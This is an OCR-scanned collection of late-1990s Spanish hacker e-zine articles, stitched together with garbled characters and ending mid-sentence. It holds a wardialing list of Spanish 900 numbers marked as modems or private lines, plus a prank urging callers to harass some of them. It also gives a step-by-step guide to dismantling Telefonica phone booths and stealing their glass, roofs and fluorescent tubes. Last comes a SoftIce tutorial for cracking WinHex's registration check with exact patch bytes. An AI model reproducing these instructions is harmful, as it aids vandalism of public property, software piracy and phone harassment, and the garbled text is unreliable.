Estos numeros son originarios de USA, creados por una de las filiales de AT£T 
en Chicago. No se crearon de la nada como algunos quieren hacer creer al 
personal la primera empresa en tenerlos fue AT8T. :) 


No busqueis el famoso fichero con todos los numeros 900 de espa=a, no tiene 
detallado nada mas que el tipo de linea y poco mas (no hay nada sobre el 
servicio que ofrece cada numeracion) . Ademas esta siempre muy atrasado, 
prueba es que paso por mis manos unos dias despues de estar este texto casi 
listo y quite altguno de los numeros que estaba activo apenas 48h antes y 
luego no. Busca con un Wardialing y te asombraras de lo que encuentras. 


Los 900 son terreno movedizo, cambian continuamente.. y andate con cuidado. 
Necesitas tener ojos en la espalda... 


4) Los Numeros 


Estos que forman parte de la busqueda hecha por mi en un rato, una hora y 1/2 
mas o menos. Y no medigas que hay pocos por no creo que quieras llenar SET 
de numeros 900, dado que hay unos 100 mil posibles no apetece. Te entretienes 
tu solito y los buscas.. 


Todo esto es un simplre ejemplo, a los 900 no *hay que tenerles miedo* simplemente 
ser cuidadoso.. 


NA = No Acepta Recibir la Llamada 
2? = Desconocido...?? 
19 £ 1! = La respuesta varia.. 


Numero 


900118484 
900202202 
900123505 
900161515 
900667788 
900100908 
900100525 
900107107 
900131131 
900131130 
900303030 
900111000 
900200314 
900506070 
900111022 
900606606 
900103900 
900232828 
900303900 
900121127 
900101110 
900352352 
900350053 


90001XXXX 


-A- Servicio (No confirmado 100%) 


Lucky Strike (9 - 19h) 

Salvamento y Seguridad Maritima 
Estado carreteras - Teleruta 

Fundacion Ayuda contra la Drogadiccion 
Tarjeta Personal Telef. 

Telefonica Moviles 

Radiomensajeria 

radiofrecuencias 

Telefonica Publicidad e Informacion 
Telefonica Publicidad e Informacion (FAX) 
Regal Hogar Seguros (8 a 22h) 
Fundacion Anti-SIDA 

Averias Hidroelectrica del Cantabrico 
Correos : Quejas y Reclamaciones 
Telefonica Servicio PYMES 
CocaCola-Fanta 

BBC English 

Mensatel 

Daewo Motor iberica 


Seguros (Ident) 
NA 


Retevision (?) XXXX (0000 - 9999) 


£ 10 Mil Numeros que pertenecen a Retevision j 
f digo yo ¿Para que querran Tantos ? ;)  ) 


900019999 


900123456 
900100908 
900102030 
900101112 


900990XXX 


900990049 


Retevision (?) XXXX (0000 - 9999) 


Barclays Bank Info 
Moviline 

BMW iberica 

NA 


Operadora de Cualquier Pais XXX Codigo Int (UK 044 / HK 852) 


Alemania 


900990852 
900990044 
900990021 


900365000 
900111222 
900111777 
900111444 
900111555 
900111666 
900111888 
900125127 
900125125 
900100200 
900555111 
900120900 
900555900 
900111900 
900111200 
900123123 
900120120 
900110110 
900112112 
900109010 
900108010 
900107010 
900106010 
900105010 
900104010 
900103010 
900102010 
900101010 
900100800 
900100600 
900100500 
900100400 
900100393 
900100391 
900100383 
900100366 
900100365 


Hong Kong 
Reino Unido 
Holanda ( y Paises Bajos) 


Renault Asistencia (24hrs) 

Fenix Directo (24hrs) 

SkiP 

NA 

No Coge Llamada 

No Coge Llamada 

Obras Hidraulicas 

Modem 

Servicio de Informacion Banco del Comercio 
NA 

Telefonica Grandes Clientes 
Telefonica Grandes Clientes 

Euskera 

NA 

Caja Espa-a / Cuelga Fuera de Horario 


Repsol 

Modem 

Banca Telefonica Banco Urquijo 

Mondial Asistencia (8 - 18h) 

Mondial Asistencia (8 - 18h) 

Mondial Asistencia (8 - 18h) 

Vasco Navarro 

Mondial Asistencia (8 - 18h) 

Mondial Asistencia (8 - 18h) 

Mondial Asistencia (8 - 18h) 

Asociacion Telefonica de Asistencia a Minusvalidos (ATA) 
Telefonica Redireccion de Llamadas 

Le 

Prado del Rey (RTVE) 

Renault (9 - 18h) 

Servicio de Informacion de IBM 

2d 

Servicio Tecnico Josen Social 

el 

Centro de Asistencia Juridica Vitalicio Seguros 


2 


900100359 2 


900100353 len 

900100350 Chestel Ban (Varios Idiomas/6 Castellano) +pin code 
900100348 ¡i 

900100347 NA 

900100346 ->a un movil ;) 

900100345 2 

900100344 Despues Ext 4XXXX X=24 Digitos 
900100342 Philips Telecomunications Iberica 
900100340 Servicio Telefonico Banco Herrero (24h) 
900100338 ie 

900100337 dE 

900100331 2 

900100326 Faisa Salud Animal 

900100323 Telefonica Moviles (24h) 
900100322 SOS Asistencia (24h) 

900100321 2% 

900100318 Modem 

900100316 hen 

900100315 Modem 

900100314 NA 

900100313 Servicio de Atencion ? (24h) 
900100311 (musica clasica) 

900100310 md 

900100308 Eliza Faberge (Madrid) 
900100307 2 

900100303 de 

900100289 2 

900100288 Modem 

900100284 Modem 

900100283 2 

900100279 Clinica Roche (8 - 17h) 
900100275 2 

900100271 dá 

900100266 ho 

900100263 Servicio al Cliente ? 

900100262 Plus Ultra 

900100258 Modem 

900100256 Modem 

900100250 le 

900100248 Como Con 


900100246 
900100244 
900100243 
900100240 
900100239 
900100238 
900100237 
900100228 
900100224 
900100222 
900100217 
900100216 
900100214 
900100208 
900100207 
900100206 
900100204 
900100202 
900100201 
900100200 
900100199 


devolveran las 


900100197 
900100195 
900100194 
900100192 
900100191 
900100190 
900100189 
900100188 
900100187 
900100185 
900100183 
900100180 


Tomas Redondo (8 - 19.30h) 
E 

Modem 

Witehur Asistencia 
Volkswagen Asistencia 
e 

Di Info 

tE 

Modem 

Modem 

Modem 

Policia 

TT Hercos 


Comisaria Nacional de Policia (Caller Id) 

Modem 

NA 

Servicio Internacional (91-6307400) 
(91-6307402) 
(91-6307403) 
(97-0836339) 


*Son unas toca webos.. jugad a llamarlas al 900 y os 
llamadas si teneis caller id, sino se putean. 


Club Financiero 

Global Calling Card (Castellano) 

Global Calling Card (Italiano) 

Global Calling Card (Aleman) 

Global Calling Card (Frances) 

Global Telecomunications Calling Cards 
Plus Ultra 

Modem 

SER 

Telecomputers 


2 


2 


900100179 Modem 14.4 **Interesante....XD** 


900100178 2 

900100177 Contestador... 

900100173 NCR 

900100170 2 

900100169 Isofresh 

900100168 Cosmetica Selecta 

900100167 Compa-1a Alemana - Calling Card 
900100166 2 

900100164 2% 

900100161 EPSON 

900100160 NA 

900100159 de 

900100156 NA 

900100155 Linea Directa Argentaria 
900100151 2% 

900100150 Atencion al consumidor Johnson $ Johnson 
900100149 Ofitel 

900100147 Servicio Gratuito de Grabaciones Don Julian (9 - 20h) 
900100144 NA 

900100142 A la Hora 

900100140 Cadena Dial 

900100136 2 

900100135 NA 

900100133 NA 

900100131 Modem/Fax 

900100128 MRV Internacional (+41 MRV 42 FedEx) 
900100123 NA 

900100122 ma 

900100121 2 

900100120 Linea Directa Aseguradora 
900100119 Arbis Trans 

900100117 Coge Llamada 

900100115 NA 

900100110 Atencion Telef. La Vanguardia 
900100109 Interesante 

900100108 de 

900100107 NA 

900100106 Modem 

900100105 CvT 


900100104 2 


900100103 
900100102 
900100101 
900100100 
900100093 
900100092 
900100091 
900100090 
900100089 
900100088 
900100087 
900100086 
900100085 
900100084 
900100082 
900100081 
900100080 
900100077 
900100073 
900100072 
900100066 
900100064 
900100063 
900100062 
900100061 
900100060 
900100056 
900100055 
900100051 
900100050 
900100049 
900100048 
900100046 
900100045 
900100044 
900100041 
900100040 
900100039 
900100038 
900100037 
900100036 


NA 

Info Guadis 

Zuritel 

Informacion al Accionista de Repsol (10 - 18h) 
NA 

La General 


Hotel 

NA 

Mensajes 
Privado ?! 
Movistar 

ee 

NA 

NA 

Prevision Sanitaria Nacional (Musica Titanic) 
Modem 

NA 

Modem 

ed 

Modem 

NA 

!! 

pe 

Modem 

Zole 

Modem 
Privado 
Euskak 

Redir - N* Privado !? 
Investigaciones 
Linea 900 


Asociacion Espa-ola Contra el Cancer 


900100035 
900100034 
900100033 
900100032 
900100031 
900100030 
900100029 
900100028 
900100024 
900100023 
900100022 
900100021 
900100020 
900100019 
900100018 
900100017 
900100016 
900100015 
900100014 
900100013 
900100012 
900100011 
900100010 
900100009 
900100008 
900100007 
900100006 
900100005 
900100004 
900100003 
900100002 
900100001 
900136524 


Via Digital 

Asistencia 

! 

Telefonica Publicidad e Informacion 
Euskera 

e 

GMSO 

E 

Dispomer Consumo (9 - 22h) 
Dispomer Consumo (9 - 22h) 
Asistencia Tecnica 

MediCare (9 - 17h) 

Telefonica Relaciones Laborales 
NA 

NA 

Urgencias Medicas 

NA 

Modem/Fax (9600) 
Modem/Fax 

Modem/Fax 

NA 

nea 

Asistencia para mujeres que sufren malos tratos 
3M (9 - 18h) 

Compa-i1a Canadiense de Tabacos 
2 

Modem 

NA 

e 

NA 

Cá£C Telecomunicaciones 


Mondial Asistencia en Carretera 


Si alguien tiene material sobre Pagers/buscas que se ponga en contacto.. 


Keep on Hacking € Hack THe PLANET! 


- GreeN LegenD - gelegendí(Wset.net.eu.org - (c) 1998 - 


*EOF* 


-[ BRICOLAJE DE CABINAS ]-------------- 


-[ by JuSJo € GreeN LegenD -]--- ===> ----- SET-20- 


Bricolaje de Cabinas 


http://www.cabitel.es 
By JuSJo £ GreeN LegenD 


JuSJo(Wgrafitti.net 
elegendíWset.net.eu.org 


AVISO : Esta informacion es simplemente educativa, tu eres responsable 
de lo que hagas con ella. NO nosotros. 


Index 
Intro........... 1 
Cabinas......... 2 
Objetivos ...... 3 
Tipo A.......... 4 
Tipo B.......... > 


Se han escrito muchos cursos sobre cabinas, de manera mas publica o 
menos. Este no quiere ser uno mas, durante unos cuantos numeros de SET 
nos tendreis con nosotros. Vamos a hacer una diseccion detallada de 

cada cabina que encontremos. Lo que cada uno haga con esta informacion 
es decision personal. Con esto queremos demostrar que las cabinas no son 
seguras y con muy pocas herramientas podemos desmontar cualquier cabina 
en un tiempo ridiculo. Que tienes urgencia de recarga tu portatil, nada 
pues cualquier cabina te vale. Que necesitas linea para el modem, pues 
nada tambien te lo soluciona. Espero que sepais usar esto con cuidado y 
no vayais por ahi destrozando cabinas por el hecho de hacerlo. Estamos 
abiertos a cualquier tipo de experiencias, enviadlas a nuestros emails 

de contacto. 


GreeN LegenD é JuSJo 


Cabinas 2 


Primero describiremos tecnicamente con ayuda de Cabitel los dos 
modelos a estudiar en este numero, las de columna modulares y las 
deluxe total que tienen un tejadillo en plan piramide de egipcia. 
Primero tienes que sabes a que te enfrentas y luego una vez estes 
familiarizado con ellas pasaremos a la accion. 


Cabinas Tipo A (modelo M segun Cabitel) : 


La calidad de sus materiales garantiza una gran durabilidad. 

Estructura de acero galvanizado y perfiles laminados de aluminio lacado. 
Acabado en pintura poliester antigrafiti. Lunas de vidrio templado con 
logotipo de Telefonica serigrafiado a la arena. 


En la parte superior cuenta con logotipo que identifica facilmente el 
servicio (tarjetas/monedas/ambas) Bandas adhesivas en los cristales 
laterales con referencia de las tarjetas de pago admitidas. 
Instrucciones de uso situadas en la mesa bajo el telefono. 


Tipo A : Columnas Verdes y Tejadillos Grises/Verdes 


Altura: 2.780 mm. 
Ancho de columna: 550 mm. 
Ancho con los telefonos en caras opuestas: 1.260 mm. 


El Soporte Cubierto es una cabina cerrada por tres lados, con paneles que 
no llegan al suelo y sin puerta. Esta pensada para alojar el Telefono 
Modular (TM) y el Telefono Modular de Interior (IMD). 

Es un espacio unico en su clase por la proteccion que ofrece al usuario. 
Acoge a los terminales instalados en lugares de climatología adversa. 


Tipo B : Cerrada por tres lados con tejado piramidal. 


Altura: 2.608 mm. 
Anchura: 970 mm. 
Profundidad: 990 mm. 


Hacking, cracking, phreacking... No SCRAPPING: para vencer a tu enemigo 
hace falta conocerlo en profundidad para conocer sus debilidades y 
explotarlas. A continuacion pasamos a exponer la cualidades que un 

grupo de individuos con los cuales no tenemos NINGUNA relacion han 
sacado sometiendo a las cabinas varios tests de durabilidad y resistencia 


a la erosion producida por la brisa marina. Las condiciones en las que se 
realizaron estas pruebas fueron: 285 Grados Kelvin de temperatura ambiente, 
773 mm de Hg de presion atmosferica, 70% de humedad, se notaba en el 
ambiente un ligero a aroma a azahar y era de noche, el cuadro metereologico 
era ligeramente nublado aunque agradable para estar por la calle, lugar donde 
se realizaron los tests. (Nota: careciendo de la instrumentacion adecuada 
para medir el la concentracion de sal en el aire y la velocidad del viento 

los test de brisa marina se dejaron para mejor ocasion) 


En el estudio preliminar uno se percata de las cabina tipo A se componen 

de tres partes claramente diferenciadas que merecen un estudio particular 

de cada una de ellas: una columna central, a la cual estan adosados los 
telefonos en si, que esta rodeado de una especie de casetilla. Careciendo 

de las herramientas (ninguna) adecuadas para una diseccion detallada de la 
columna o el telefono y viendo que la casetilla es claremente cutre se 
decidio empezar por examen de esta, e ir llevando equipo segun veamos que 
lo necesitamos (las herramientas pesan huevo y no es plan de ir cargando 
con un cajas de herramientas por la calle). 


El techo de la casetilla esta hecho de hojalata (se pueden conseguir dos 
duros vendiendolo como chatarra) y empujandolo desde abajo se dobla con 
lo que los cristales de los laterales que estan mal pegados, practicamente 
estan solo encajados, quedan sueltos (no del todo, pero un codazo ayuda). 
Sigamos, en nuestro empe-o de diseccionar las cabinas. Para airear mas 
las casetillas de estas cabinas la mejor manera es entre dos personas y 

sin necesidad de mas herramientas que las que tenemos nosotros mismos. 
Uno empuja primero en un lateral del tejadillo hasta que doble la chapita 

y lo mantiene subido mientras tanto el otro tira un poco hacia arriba de 

los cristales laterales. Los cristales estan reposando sobre la base del 
tejadillo, no tiene ninguna clase de sujeccion estan simplemente encajados. 
Cuidado porque pesan y si se te caen pues puede ser la risa el ruido que 
hacen, por no hablar de la partidura de culo que puede pillar tu colega 
como se le caiga en un pie, por si acaso no ir en chanclas mejor unas 
Chirucas. 


Ax XA 


OS x <- Punto donde aplicar y mantener la fuerza. 
MAN : 
MAA: AAA <- Direccion de abajo a arriba.. 
: <- Cristal Lateral 
V | | 
| | 
11] // 


Espero que este todo claro por ahora.. sigamos pues 

Que mas partes tiene esta cabina, pues si observamos veremos que hay varias 
placas tanto arriba sobre los tejadillos como debajo de las mini-mesas que 

estan debajo de los telefonos. Si buscas en las placas de la zona baja y si 
realmente observas como un hacker veras enseguida que todas tienen algunos 
logos en la esquina inferior izquierda. Pero si vuelves a mirar veras que 

solo una de las caras tiene un rectangulo mas grande. Esta es la placa que 

nos interesa. Aqui hoy dos opciones para abrirla, una tenemos una buena llave 

o llavero metalico que nos permita hacer palanca con seguridad o hemos 
planeado esto antes y tremos un destornillador grande con nosotros. 

Estas placas con poca fuerza se abren pero, yo recomiendo el destornillador. 

Con hacer una minima palanca se abre. Aviso! Cuidado por que se supone que 
esta placa tiene un sistema tipo puerta, pero muchas veces si NO LA COGEMOS 
FUERZA se te caera y se hara MIL PEDAZOS, armando un escandalo del copon y 
haciendote que te traslades a otra cabina. Avisados estais y el que avisa no 

es traidor. Una vez abierto se ve lo siguiente. 


Caja de fusibles en un lateral, en la parte inferior justamente debajo 
de la mesita. Caja de fusibles que controla todo la corriente de las 
cabinas, con 2 slots libres. 


/ |  <- Panel de cristal que se abre en plan puertezuela. 
o Y contiene un cable de aceso general. (Entubado) 


o A 
A: 
pr / 
| | Esta es una representacion psicodelica de 
po] una cabina de Cabitel Tipo M. Para averiguar 
--. [0.[/]|--.| donde esta la caja de fusibles se deben de dar 
xx| || [xx] unos golpes en la zona baja hasta que se de con 
x|[0' [x |] un panel que no suene a hueco. 
X | |----"X || 
dl 
| | 
Ne A 
| 
== 
001 
| 
| 
¡DD | DD = Marca en el cristal que nos indica que es lateral. 
UU U 


Mas cosas sobre estas cabinas. Ahora Cabitel para poder poner mas publicidad 
esta cambiando los laterales de la cabinas. Instalando algo asi. 


[_o] [o_] | 


o| o <- En modelos sin lateral ancho. 


t  t  t= Tornillos de la base. 


Y que diversion puede tener esto ? pues nada que quieres hacer una 
campa-a de propaganda en tu barrio sin tener que pagar un duro hazte 
con una llave de triangulo, las dan gratis en las tiendas de gas. Dado 
que todas las cajas de registro externas del gas las llevan. 


Hacker : Oiga me podria dar Vd. una llave para la caja de registro del 
del gas que la he perdido/se me ha roto ? 


Tendero : De que tipo ? 
H : De las de las de triangulo. 
T : Aqui tiene una. 


H : Adios gracias. 


Y ya esta, ahora puedes abrir todas las cabinas. 

En los modelos que no tienen la publicidad horizontal nueva la cerradura 
esta abajo a la derecha. Para abrir metes la llave hasta el fondo y giras. 

En las grandes nuevas es algo mas complicado, necesitas dos llaves. 

Y corres el peligro de que este jodidas las cerraduras y no se abran. 

Pero con practica puedes conseguir dos tubos fluorescentes de mas de metro 
y medio. Que estan dentro de los paneles laterales altos. 


El tipo B (modelo H) a ojos del no iniciado puede parecer imponente, algo 
robusto y resistente, no te preocupes solo unos pocos nacimos expertos. 


No sufras es todavia mas cutre y pachanguera que el modelo anterior. 
Siguiendo un proceso similar al anterior un examen preliminar volvimos 

a considerar 3 partes: el tejadillo, el cuerpo de la cabina y la cabina 

en s1. Despues de un examen mas concienzudo se llego que a la conclusion 
de que el tejadillo es horriblemente hortera, estaria mejor si colocaran 

un esfinge al lado haciendo juego, vamos a por el. ;) 


En nuestra pura inocencia probamos a empujar el tejadin para tratar de 
averiguar que clase de soportes los unian al cuerpo porque nos los veiamos, 
maravilla maravillosa salio solo, no esta sujeto con nada. Lo unico que 

evita que puedas recrear la corte de Ramses en tu casa son los cables de 

la cabina que suben por esa especie de tuberias que forman el cuerpo nada 
que un poco de planificacion por vuestra parte no pueda solucionar. 

Que os parece guardaros cualquier tipo de alicate y cortar ? Si, lo has 
adivinado. Ya tienes una piramide para tu cuarto! Ahora los sin techo pueden 
escoger en dos colores, gris metalizado o verde timofonica! :) 


PA 
A 
/ NN 
Ho +. NX $ Cable triple entubado con el resto de cables. 
Ú Urmmo--- U-- U 


UTTTU UU 


Bueno, ya seguiremos con esta en otro momento, que los cristales parecen 
apetitosos no ? Calma. En el futuro os contaremos como haceros una mesa 
de salon con cristal de seguridad de Cabitel. 


Bricolage 6 


Vamos que no sabes que hacer con lo que te acaba de regalar Telefonica ? 
Pues te damos algunas ideas. Con los cristales que crecen en la cabinas 
tipo A puedes hacerte : 


- Una mesa 

- Un cabecero de cama 
- Un biombo 

- Una estanteria 


Para hacer esta necesita solo una pieza de cristal, un lateral me refiero. 

Un bote de pintura en espray (1/2 Litro 400pts +/-) de el color que quieras. 

Yo personalemte recomiendo negro para resultados optimos. Necesitaras algun 
tipo de patas, esas la puedes hacer o bien con botes de cocacola usados y 

cola fuerte. Comprarlos en Ikea, ya las venden hechas unas 3K las cuatro. 

O bien puedes usar cajas minitorre como patas. Pintas la parte que tiene el 

lado serigrafiado a la arena, el aspero, y te queda una peazo de mesa. Por 
cuatro duros, Quien dijo que los muebles son caros ? Se puede hacer una 
variable de esta mesa con dos cristales. 


So cristal superior sin pintar. 


o cristal inferior pintado por debajo 


Esta es la tipica mesa de periodicos, con el mejor efecto. Buen acabado y 
muy facil de limpiar. 


Cabecera de Cama : 


Esto es mas de buscarse la vida, simplemente el tama-o es el ideal y con un 
par de tablas te lo haces, como cada cama es distinta pues tendreis que 
echarle imaginacion. Pero os garantizo que funciona y queda muy bien. 
Para este no pongo planos a lo mejor en el proximo articulo. 


Biombo : 


Este es el clasico, dificil de hacer pero queda muy vistoso. Necesitaras 
hacerte con maderas con un surco de 1 1/2cm, necesitaras dos laterales 
largos por cristal y tres bisagras (2 - 3 cm alto) y lo mas importante 

la base que tiene que ser lo que va soportar todo el peso. Esto lo que 

yo personalmente recomiendo es hacerse con cualquier catalago de muebles 
de cualquier tipo (el mejor IKEA) y mirar como estan hechos los biombos. 
Dado que esta es una publicacion relacionada con el Hack y no con el 
bricolaje. La idea es facil. 


Estanteria : 


Esta es la mas facil de todas, necesitas un bote de 1/2 Litro de pintura 

en espray, tipo plastica Titanlux por ejemplo. Los botes vienen en 

dos tama-os, 200cc y 450cc y dado el tama-o de los cristales de T es 
necesario el de casi medio litro. El precio es ridiculo. No llegan a las 

600pts si te quieren cobrar mas ya sabes donde les puedes decir que se metan 
el bote. Luego necesitas dos o mejor tres regletas de las de sujeccion que 

sean suficientemente grandes para cubrir por lo menos el 70% de la superficie 
del cristal. Mas que otra cosa para que cuando estes leyendo el numero 21 de 
SET no se te desmonte la estanteria y se te caiga en la cabeza mientras estas 
leyendo. Asegurala bien, nada como un buen agujero hecho con un taladro. 


| <- Se supone que la regleta debe de ser grande. 


Para finalizar pinta por el lado que tiene la serigrafía a la arena con 
el logo de T de el color que quieras. Yo personalmente recomiendo negro. 
Se debe de pintar en una habitancion suficientemente aireada. Y dejarlo 


que se seque una hora como minimo. Hay que pintar por el lado que el logo 
de T esta aspero. 


(c) SET 1999 
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Convertir obstáculos en ventajas 
y tomar la oportunidad de pelear. 
Sun Tzu "El Arte de la Guerra" 


1 Unas palabras... 


¿Cómo llegar a ser un cracker?, ¿cómo empezar a crackear?. Esta es mi humilde contribución 
al vasto campo de la "introducción a la ingeniería inversa y crackeo", o El Arte como yo le llamo 
(el cual es parte de Las Artes). 


Este tutorial está pensado para principiantes. Como veréis, la protección que quitaremos es 
bastante simple. El programa objetivo es una herramienta buena,  WinHex 
(http://www.winhex.com), que ciertamente necesitaréis en vuestro crackeo. 

Esta es la forma en que los crackers trabajan, si necesitáis algo, modificad un programa similar 
o crackead el que necesitéis. Sé que esto puede sonar un poco extremo, pero nada debe para- 
ros en vuestra Búsqueda, y no especialmente una protección. 

Por supuesto, os animo a enviar el dinero debido al autor si pensáis que WinHex es una gran 


herramienta. El precio no es excesivo (alrededor de $ 25 para uso personal), y las actualizacio- 
nes son frecuentes. Es mejor para vosotros... 


2 Contactos 


Si deseaseis contactar conmigo, mandadme un e-mail a xerxesOaltern.org. Podéis conseguir mi 
llave pública PGP en http://altern.org/xerxes que es la URL de mi modesto sitio web. Ya que soy 
francés, podéis escribirme en francés o inglés. Usad el lenguaje que prefiráis. También podéis 
contactar conmigo a través del tablón de mensajes de +Fravia. 


Por favor, evitad e-mails inútiles, esto es, ¡preguntad sólo cuestiones inteligentes!. De otra 
parte, serán bienvenidas críticas y sugerencias, también correcciones. 


No uso nunca ICQ ni IRC, así que si conocéis alguien que dice ser ArthaXerXés, usando ese 
medio, es mentira. 


3 Los requisitos 


Para llegar a ser un cracker de Windows, principalmente necesitaréis saber dos cosas: 


1. El lenguaje ensamblador de x86. 
2. La API de Windows. 


Será realmente duro llegar a ser un cracker si no sabéis nada sobre lenguaje ensamblador. 
Admito que no necesitáis un conocimiento perfecto de la API de Windows, ya que La Referen- 
cia de Microsoft para Programadores de Win32 contiene una documentación preciosa. 


4 Software usado 


Para crackear, necesitáis un debugger, y Softice es el mejor. No hay un segundo lugar en el 
mundo del crackeo. Para más información, consultad http://www.compuware.com. La versión 
que usé en este ensayo es 4.01, pero no creo que importe. 


Importante: Softice no es gratis. 


5 Quitando la protección 


Antes de hacer nada, haced una copia de seguridad de winhex.exe a otro archivo, winh.exe por 
ejemplo. 


5.1 Localizadlo 


Como notasteis, WinHex no puede guardar archivos más grandes de 250 kb en la versión sin 
registrar. 

Esto es una gran indicación para obtener una nag screen (ya que otras nag screen aparecen 
casualmente). Cargad cualquier archivo más grande de 250 kb en WinHex, e intentad guar- 
darlo. Una caja de diálogo os informaría que es imposible. 


Lo que podéis remarcar es que no es una caja de mensaje (creada por la función MessageBoxA 
O MessageBox) sino una caja de diálogo. Poned un breakpoint en DialogBoxParamA, que es la 
función usada por Windows para iniciar una caja de diálogo (como probablemente adivinas- 
teis). El comando es bpx DialogBoxParamA. 


Softlce puede contestar algo como "Symbol not defined (DIALOGBOXPARAMA)", esto 
significa que no informasteis a Softlce que debía cargar exportaciones de User32. Que 
no cunda el pánico, no es preocupante. Ejecutad el Symbol Loader y elegid "Softlce 
initialization settings” en el menú de "Edit". Cliquead en "Exports" y añadid user32.dll. 


Incluso es una buena idea añadir otras exportaciones, tales como kernel32.dll, gdi32.dll, 
shell32.dll, etc. Esta tarea puede incluso ser ejecutada editando el archivo winice.dat, 
que está localizado en el directorio de Softlce, con la ayuda de un editor de texto. 


Por supuesto, necesitaréis reiniciar para que los cambios tengan efecto. 


Intentad guardar de nuevo el archivo y os encontraréis muy al principio de la función Dialo- 
gBoxParamA. Tendréis que volver a la llamada de la función, esto se hace presionando Fl1 
cuyo alias es g Oss:esp. 


De hecho, la dirección de la llamada está al principio de la pila, además si le decís a Softlce 
"ejecuta hasta alcanzar la dirección localizada en ss:esp (la cual está al principio de la pila)", 
volveréis a la llamada. 


5.2  Entendedlo 


No prestéis atención a la distribución del código que os muestro en este ensayo. Viene 
de IDA (una herramienta de la que oiréis hablar a lo largo de vuestra carrera de 
crackeo) y no de Softlce, esta es la única razón. 


Después de haber presionado F11, presionad enter para hacer desaparecer la caja de diálogo, 
y estaréis de nuevo en Softlce. 


push 1 

mov eax, DS:44300 Ch 
push  eax 

call sub_404A40 


mov byte ptr DS:446C52h, 0 ;< ¡estáis aquí! 
cmp byte ptr [esi+0Ah], 2 
¡nz short loc_408E56 


Trazad con F10 hasta que volváis a la llamada a la función en la cual estáis actualmente y que 
hace algún tipo de salto u operación correcta después de la llamada. En nuestro caso, debe- 
mos ir a la llamada de la llamada, esto es dejaremos la función actual además de otra (dejáis 
una función cuando ejecutáis la instrucción ret). 


Esto es donde deberíais estar ahora: 


call sub_408D80 
xor eax. Eax ; < eax se pone en O aquí 
jmp short loc_4251EA 


loc_4251E8: 
mov al, 1 ; < el valor devuelto es 1, notad que saltamos por encima. 


loc_4251EA: 


pop  ebp 
retn 8 


Ahora parad y pensad. En un momento u otro el programa debe chequear si WinHex está re- 
gistrado o no. Si no está registrado una caja de diálogo debe mostrarse, además el archivo 
será grabado, como dije. Esto implica, que una comparación ha sido hecha antes de la direc- 
ción actual, y que debe saltar sobre la dirección actual (probablemente a loc_4251E8). 


Subid con el cursor (CTRL+ARRIBA), hasta que encontréis esto: 


cmp byte ptr DS:446C81h, 0 
jnz short loc_4251E8 


Bien, si el contenido de la dirección 446C81h es 1, ninguna caja de diálogo se mostrará y el 
archivo será grabado. La primera idea que puede venir a vuestra mente es reemplazar jnz short 
loc_4251E8 por ¡mp short loc_4251E8. No es una buena reflexión. 


5.3  — Quitadlo 


En mi humilde opinión, la mejor solución es poner un breakpoint en el acceso de memoria de la 
dirección 446C81h, salir del programa y reiniciarlo. 


¿Por qué?. Cuando el programa comienza, tiene que comprobar si está registrado o no (miran- 
do ya sea en el registro o en el archivo de configuración), y de acuerdo con el resultado, el 
valor boleano será puesto a 0 o 1. Si ponéis un breakpoint en el acceso a memoria en el valor 
que encontramos, apareceréis en la rutina de iniciación, de este modo sabréis como enloque- 
cer al programa desde el principio, lo cual es mucho mejor. 


De hecho, si modificáis el salto, también tendréis que cambiar todas las otras comprobaciones 
dentro del programa, y creedme que es muy fácil olvidar una comprobación. 


Necesitáis poner un breakpoint para el acceso de escritura, a fin de evitar el código que sola- 
mente lee el valor del boleano. El comando es bpm ds:446C81 W. Ahora salid del programa y 
reiniciadlo. 


Apareceréis aquí: 
reg_no_ok: 


xor eax, eax 
jmp short guarda_reg_bol 


reg_ok: 
mov al, 1 


guarda_reg_bol: 
mov DS:446C81h, al ;< ¡aquí se modifica el boleano! 
Jmp short loc_441268 


Es fácil entender qué ocurre aquí. Las comprobaciones son hechas antes de este código, y si 
ocurre algún error, saltaréis a reg_no_ok el cual coloca al a 0, de otro modo saltaríais a reg_ok 
que colocará al a 1. El registro entonces es grabado en el boleano. 


Por ahora, tendréis que testear si nuestro descubrimiento es correcto. Colocaos en la dirección 
reg_no_ok (cambiad el valor de eip, r eip=441232). Cambiad el código a esta posición para que 
eax sea puesto a 1 y noa0. 

Antes de hacerlo, escribid abajo los valores hexadecimales (10 valores son suficientes) del 
código que comienza en 411232 que es la dirección de reg_no_ok. Los necesitaremos más 
tarde. Para desplegar los bytes de la instrucción en el código windows, necesitaréis usar el 
comando code on. 


Ahora podemos parchear el código: tendréis que usar el ensamblador interno de Softlce. Escri- 
bid a, y luego mov al, 1. Presionad return dos veces. Escribid abajo los dos nuevos bytes. 


Es hora de comprobar el crack. Desactivad todos vuestros breakpoints (escribid bd *) y ejecu- 
tad el programa (escribid g). Parece que está registrado ahora ¿no? :-) 


¡No cerréis el programa!. El código sólo ha sido modificado en memoria. Abrid vuestra copia de 
winhex.exe que es en mi ejemplo winh.exe. Buscad los bytes 33 Oc eb 02 b0 01 a2 81 y cam- 
biadlos por b0 01. Como notasteis, son los valores de bytes que os pedí que escribieseis abajo. 


Cerrad el programa y ejecutad winh.exe... 
.. enhorabuena, ¡acabáis de crackear WinHex!. 


6 El final de este corto ensayo 

Ahora tenéis el mejor editor hexadecimal que se puede encontrar actualmente. Este tipo de 
editor es una herramienta importante, creedme. WinHex permite complejas comparaciones 
entre archivos, puede hacer búsquedas complejas, es capaz de editar memoria, etc. 

Muchos programas que piden un código de registro están protegidos de esta forma. Sugiero 
que intentéis en otros programas lo que aprendisteis aquí, porque no hay mayor profesor que la 
experiencia. 


Realmente espero que este ensayo os anime a continuar aprendiendo El Arte, si hay peticiones 
para más ensayos "newbies", escribiré una secuela con diferentes objetivos. 


Lo que deberíais recordar: 

e Cuanto menos código modifiquéis, mejor es. 

e  Estambién una pérdida de tiempo tracear sin tener una idea de lo que andáis buscando. 
e  Aprended cómo usar vuestras herramientas. Gastad tiempo con ellas. 

e  ¡Usad vuestro Conocimiento!. Todo lo que sepáis puede ser útil. 


Para mayor información, os recomiendo enfervecidamente consultar la "página continuada de 
ingeniería inversa de Fravia" (http://g0.to/tshep). 
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El final de este (muy) corto ensayo 


versión 1.0 


¿Qué haríais si llegaseis al final de la montaña más alta?. 


1 Prólogo 


Bienvenidos a este nuevo ensayo. La respuesta positiva resultante del primer ensayo me ani- 
mó a escribir este nuevo. Supongo que notasteis que dominar el Arte es una tarea larga y dura 
pero si estáis leyendo este ensayo, significa que estáis dispuestos a trabajar. 


La Ingeniería Inversa no es sólo quitar protecciones, es (en mi opinión) entender cosas así 
como ser capaces de transformarlas. A veces la meta de la transformación es quitar una res- 
